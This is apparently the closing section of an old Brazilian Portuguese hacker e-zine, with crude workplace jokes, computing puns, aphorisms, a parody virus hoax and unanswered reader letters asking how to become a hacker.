 7. Você é pago para criar fantasias em seus clientes
 8. É difícil ter uma família
 9. Você não tem satisfação no seu trabalho
10. Se um cliente não gostou de você, o cafetão te manda para outro
    cliente
11. Você fica constrangido em contar às pessoas o que você faz para viver
12. Seu cliente paga pelo seu trabalho mais a despesa do hotel
13. Seu cliente sempre quer saber quanto você cobra e o que ele vai ter
    direito
14. O cafetão dirige carros de luxo como Mercedes ou BMW
15. Você sabe que o cafetão cobra mais do que você vale mas se o
    cliente é burro não é problema seu
16. Quando você vai no cliente, você tem uma cara ótima, mas quando sai
    está um horror (comparando com sua cara na segunda de manhã com a de
    sexta à tarde)
17. Você é avaliado pela sua "performance" num trabalho vergonhoso
18. Embora você ganhe uma boa grana, seu cliente é que sai com a cara
    feliz
19. O cliente sempre acha que está pagando mais do que deveria, e, por
    outro lado, espera que voê faça milagres
20. Quando você recebe o seu percentual sempre imagina se com outro
    cafetão não receberia mais.

-------------------------------------------
Taglines

Quem é da área da computação não tem defeitos, tem BUG`s; 
não tem memória fraca, tem pouca memória RAM; 
não acorda de manhã,dá um boot nas idéias; 
não namora, faz um download em alguém; 
Não transa, se conecta a alguém; 
não brocha, tem uma queda de conecção, 
e por último não caga, passa um e-mail

Obs: Tem uma Silvia R.G. que realmente arruma piadas..

> Dicionário
> 
>  
> "O asterisco nada mais é do que um ponto final
> Hippie."
> 
> "O que é um intelectual? Apenas um homem que
> descobriu alguma coisa mais interessante do que as
> mulheres."
> 
> "Loteria: acho que, jogando ou não, você tem a mesma
> chance de ganhar."
> 
> "Um expert é um homem que parou de pensar. Para que
> pensar, se ele é um expert?"
> 

> "A arte da Medicina consiste em distrair enquanto a
> Natureza cuida da doença."
> 
> "Plano Real é uma idéia na cabeça e uma câmara de
> Deputados na mão."
> 
> "Um repórter de rock é um jornalista que não sabe
> escrever, entrevistando gente que não sabe falar,
> para pessoas que não sabem ler."
> 
> "Os conservadores são pessimistas quanto ao futuro e
> otimistas quanto ao passado."
> 
> "Uma celebridade é uma pessoa que trabalha duro a
> vida inteira para se tornar conhecida, e depois
> passa a usar óculos escuros para não ser conhecida."
> 
> "A morte de uma pessoa é uma tragédia; a de milhões,
> uma estatística."
> 
> "Escrever é transformar os seus piores momentos em
> dinheiro."
> 
> "Morte é a vida respondendo à pergunta: 'Por quê?'."
> 
> "Lixo: coisas que jogamos fora. Coisas: lixo que
> guardamos."
> 
> "Advogado: Forma larval de um político."
> 
> "Bibliotecas: Não há respostas, apenas referências
> cruzadas."
> 
> "Matemática é a linguagem que Deus usou para
> escrever o Universo."
> 
> "O homem contemporâneo é o elo perdido entre macacos
> e seres humanos."
> 
> "Multitarefa: Ler no banheiro."
> 
> "Filosofia: Respostas obscuras para questões
> insolúveis."
> 
> "Canela: Dispositivo para achar móveis no escuro."
> 
> "O mais nobre de todos os cachorros é o
> cachorro-quente: ele alimenta a mão que o morde."
> 
> "Gato: um autômato flexível e indestrutível,
> fornecido pela natureza para ser chutado quando as
> coisas vão mal no círculo doméstico."
> 
> "Chato: Uma pessoa que fala quando deveria estar
> ouvindo."
> 
> "Lógica: método sistemático de chegar a conclusão
> errada com confiança."
> 
> 
------------------------------
Atencao: ha um novo virus solto por aih.

    Eh pior que tudo que jah viu. Ele trabalha alterando a posicao dos
pinos das portas seriais e revertendo o  sentido da rotacao do disco
rigido.
    Mais de 300.000 sistemas jah foram infectados em  Murphy, West Dakota.
E isso em apenas doze meses.

    Veja como prevenir o avanco do mal:

  1-Nao ligue o computador na tomada!

  2-Nao use baterias! Ha rumores de que o virus invadiu boa parte das
fabricas de baterias e infectou os polos positivos delas(solucao:tente
conectar apenas o polo  negativo).

  3-Nao faca upload ou download de programas pela Internet

  4-Nao acumule arquivos nos floppy disks ou no disco rigido

  5-Nao leia mensagens! Nem esta!

  6-Nao use portas seriais, modens ou linhas telefonicas

  7-Nao use teclados, scanners ou impressoras.

  8-Nao acesse CPUs, memorias, microprocessadores ou mainframes

  9-Nao use luz eletrica, aquecimento a gaz ou ar-condicionado, agua
corrente, fogo, roupas ou mesmo a roda!

Tenha que certeza de que, seguindo a risca esses noves passos, seu virus
sera erradicado. (*inclusive voce do resto da civilizacao!).:-)
------------------------------------------------
 
                Amar e
>
>        Se voce ainda pensa que amar e ir ao cinema, tomar sorvete e abrir 
>a
>porta para ela, sinceramente, voce n o sabe que ja inventaram a INTERNET??
>
>        Amar e
>
>        Amar e:
>        enviar pra ela e-mail com background de coracaozinho.
>
>        Amar e:
>        enviar mailbomb pro cara que passou cantada publica nela.
>
>        Amar e:
>        enviar todos os 100 Sonetos de Amor do Neruda, um por dia,
>        religiosamente.
>        Nao obstante ainda contar como acordou, contar que escovou
>        os dentes, tomou cafe e tudo mais. E Ela lendo...
>
>        Amar e:
>        fazer Home Page dedicada especialmente pra Ela.
>
>        Amar e:
>        IMAGINAR como ela deve estar linda  hoje (Tera passado a
>        tendinite?).
>
>        Amar e:
>        enviar flores virtuais pedindo desculpas quando chegar
>        atrasado para o chat.
>
>        Amar e:
>        ela nao engolir as desculpas, nao responder as mensagens e
>        ficar away no ICQ.
>
>        Amar e:
>        fazer icqxo.
>
>        Amar e:
>        criar juntos um Tamagouchi virtual.
>
>        Amar e:
>        contar a ela tudo o que voce nao contaria ao vivo.
>
>        Amar e:
>        fazer com ela tudo o que voce nao faz ao vivo.
>

Para sair ou pesquisar historico da lista, visite: http://listas.ansp.br -------------------------------


Cartinhas:

  • Por favor, eu sou LOUCA para aprender a ser um hacker, não para o mal, e sim para o bem, gostaria muito de ser um, mas não sei nem por onde começar, estou perdida no meio de tanta informação, não sei do que preciso, não sei quais são os programas que sevo ter, mas quero muito ser um hacker, me ajuda? ass:
  • pô cara,,, eu estou estudando desesperadamente,, por um lado acho que sou meio anti- social,, não costumo muito sair a noite ,,só se for com mulher,,,,, PASSO A MAIOR PARTE do tem po no micro e estudando informação,, estou louco para aprender programação ,, meu!!!!!! me de uma ajuda por favor,,,,, pelo menos palavras,,, onde posso pesquisar,, não quero que pô cara,,, eu estou estudando desesperadamente,, por um lado acho que sou meio anti- social,, não costumo muito sair a noite ,,só se for com mulher,,,,, PASSO A MAIOR PARTE do tem po no micro e estudando informação,, pô pessoal; estou louco para aprender programação ,, meu!!!!!! me de uma ajuda por favor,,,,, pelo menos palavras,,, onde posso pesquisar,, não quero que vcs percam muito seu tempo,, sei que vcs com níveis mais elevado não gostam de ficar ensinando muito as pessoas a caminhar,,,, gosto muito de informática,, estudo na Unicamp,,, e trabalho aqui TB. ,, tenho informações muito importantes ; leio todas suas revistas, e estudo programaçãos por conta;estou emm busca de todo qualquer tipo de conhecimento, estou aberto para informações; cara!!!!! só de vc me responder ficarei eternamente grato!!!!!!! muitíssimo obrigado,,,, adoro sua home page!!!!!! um abraço ass:??????
  • Sei q hacker nao se ensina a ser, e sim q ele se cria, mas mesmo assim gostaria muito de ter a disposição sites e informações de pesquisas, q possam me ajudar no caminho para q talvez, algum dia, eu possa me tornar um HacKer ... TKS ...
  • Tenho 18 anos Moro em Porto Alegre-RS Adoro comput , mas não estou muito atualizado neste assunto ..Gostaria que você me desse algumas dicas ! Como livros , linguagens etc... Gostaria de me tornar um hacker se possível obrigado pela sua atenção !!!!Aguardo sua resposta atenciosamente !!!!
  • To afim de aprenter.....( pra começo de história ) já tentei de tudo para ter mais informações sobre o assunto, sou fanático por computadores, mas vc deve saber como é difícil se tornar um hacker. sei que é chato mas gastaria que vc me auxilia-se nessa coisinha que é tão simples para vc, e tão complicado para muitos. Grato pela atenção. se vc puder me ajudar por favor me mande um email
  • Dae cara, beleza? Eu gostaria de saber como faço ligações interurbanas de graça, tanto faz se é de telefone público (orelhão) ou de telefone particular. Ficarei muito agradecido se vc puder me ajudar. Valeu
  • Gostei muito da tua Home Page e Revista. Gostaria que me desse algumas dicas e informações que me ajude no conhecimento do assunto. Vou logo avisando que nada disso visa o mau uso destas informações, uma vez que so estou interessado em saber cada vez mais e não utilizá-las para prejudicar ninguém. Afinal, tive boa eduação por meus pais. :)! Um abração !!!!.
  • Eu sei que minha atitude é um pouco lamer mas eu ja estou a mais de 3 anos na red e ainda não consegi invadir e nem criar virus eu queria saber como eu faço para ser hacker, oque eu devo aprender em primeiro lugas oque eu devo ter conhecimento, e eu quero saber se vcs editam uma revista sem ser virtual se vcs entregam em casa exemplares. espero sua resposta e desde ja eu agradeço
  • Eu faco programacao a muito tempo, ja fazia jogos e programas a tempo e so fazia programas com coneccao fia modem mas direto, sem a internet, e agora aprendi como usar o Winsock. Eu ja fiz varios programas, fiz um chat pra varias pessoas, fiz jogo da velha on line, fiz um servidor de TELNET, fiz até um servidor de HTML mas nao deu muito certo, nao sei como mandar foto... mas tudo bem, e agora fiz um bom pra hackear, com uso simples de porta e IP... qual o proximo passo, eu consigo abrir ou conectar a IP que eu quizer usando a porta que eu quizer... mas e agora??? se puder me ajudar... eu realmente agracederia...e só mais uma pergunta, quando eles entram no FBI por exemplo eues usam o endereco certo mas a dificuldade é achar a porta???
  • Ae sou de uma cla mais não sei nada queria que vc mandase programas faceis de usar e me ensinar a ser um hacker VALEU!!!!!

REsposta:

Aguardem o meu livro...

Bibliografia:

A maior parte das notícias veio da página http://www.hackernews.com ou da lista da http://cnn.com